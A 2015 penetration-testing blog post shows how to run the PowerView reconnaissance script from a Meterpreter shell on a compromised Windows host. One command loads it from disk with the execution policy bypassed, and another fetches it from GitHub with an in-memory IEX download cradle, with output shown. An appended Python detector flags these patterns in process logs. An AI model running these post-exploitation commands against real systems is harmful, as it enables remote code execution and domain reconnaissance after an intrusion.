Monday, February 23, 2015

Running PowerShell Scripts That Require Module Imports With Meterpreter


Old post on the subject here:

http://carnal0wnage.attackresearch.com/2012/10/run-powershell-module-in-meterpreter.html

More recent posts on the subject by harmj0y:

http://www.harmj0y.net/blog/powershell/derbycon-powershell-weaponization/


Anyway, option #2 from harmj0y's "The PowerShell Weaponization Problem" post works OK if you don't care about the script being on disk.

Gist with the command

meterpreter > shell
Process 2380 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>


Via IEX download method: Gist with the command

C:\Users\user\Desktop>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
UNLUCKYCOMPANY.COM

C:\Users\user\Desktop>
CG
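Both invocation styles above leave a recognisable process command line behind (Sysmon Event ID 1 or Security event 4688). As an added example that is not part of the original post, here is a small Python check that classifies such command lines into the on-disk Import-Module case and the in-memory download-cradle case; the sample lines are constructed to mirror the post's two commands plus one benign invocation.

```python
import re

# Constructed sample process-creation command lines, shaped like what Sysmon
# Event ID 1 or Security event 4688 records. They are made up for this example;
# the first two mirror the two invocation styles shown in the post.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -exec bypass -Command \"& {Import-Module "
    "'C:\\Users\\user\\Desktop\\PowerTools\\PowerView\\powerview.ps1'; Get-NetDomain}\"",
    "powershell.exe -exec bypass -Command \"IEX (New-Object Net.WebClient)"
    ".DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools"
    "/master/PowerView/powerview.ps1'); Get-NetDomain\"",
    "powershell.exe -NoProfile -Command Get-Date",  # benign, should raise nothing
]

# -ExecutionPolicy may be abbreviated (-exec, -ep); match the common spellings.
EXEC_BYPASS = re.compile(r"-(?:executionpolicy|exec|ep)\s+bypass", re.I)
# Script text is fetched over the network and evaluated in memory: nothing on disk.
DOWNLOAD_CRADLE = re.compile(
    r"(?:IEX|Invoke-Expression)\b.*?\.Download(?:String|Data)\s*\(", re.I | re.S)
# Script is imported from a file; capture the .ps1 path so the file can be collected.
ON_DISK_IMPORT = re.compile(r"Import-Module\s+['\"]?([^'\";]+?\.ps1)", re.I)
# Locations an unprivileged user can write to; a module loaded from here warrants a look.
USER_WRITABLE = re.compile(r"^(?:[A-Z]:\\Users\\|%?TEMP%?|[A-Z]:\\Windows\\Temp\\)", re.I)


def classify(cmdline: str) -> dict:
    """Return the detection flags raised by one process command line."""
    flags = []
    module_path = None
    if "powershell" in cmdline.lower():
        if EXEC_BYPASS.search(cmdline):
            flags.append("exec_bypass")
        if DOWNLOAD_CRADLE.search(cmdline):
            flags.append("download_cradle")        # in-memory: no file to find later
        m = ON_DISK_IMPORT.search(cmdline)
        if m:
            module_path = m.group(1)
            flags.append("on_disk_module")         # file exists: hash and collect it
            if USER_WRITABLE.match(module_path):
                flags.append("module_in_user_path")
    return {"flags": flags, "module_path": module_path}


def scan(cmdlines):
    """Return (line_index, classification) for every line that raised a flag."""
    hits = []
    for i, line in enumerate(cmdlines):
        result = classify(line)
        if result["flags"]:
            hits.append((i, result))
    return hits


if __name__ == "__main__":
    for i, result in scan(SAMPLE_COMMAND_LINES):
        print(i, result["flags"], result["module_path"])
```

The on-disk case gives you a file to hash and retrieve; the download-cradle case does not, so for it the command line itself and the outbound HTTPS request are the evidence.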

2 comments:

OJ said...

Executing PowerShell through Meterpreter is a hot discussion topic at the moment. A few people are pondering options and I'm playing with a couple of ideas to make this a little nicer. It might be nice to have a command that sits alongside "shell" which is called "powershell" that just gives you an interactive PS prompt. This might have to be done via a new extension though, given that it'd probably require automation of PS rather than shelling out to it and mucking with std handles.

So watch this space!

CG said...

yes plz :-)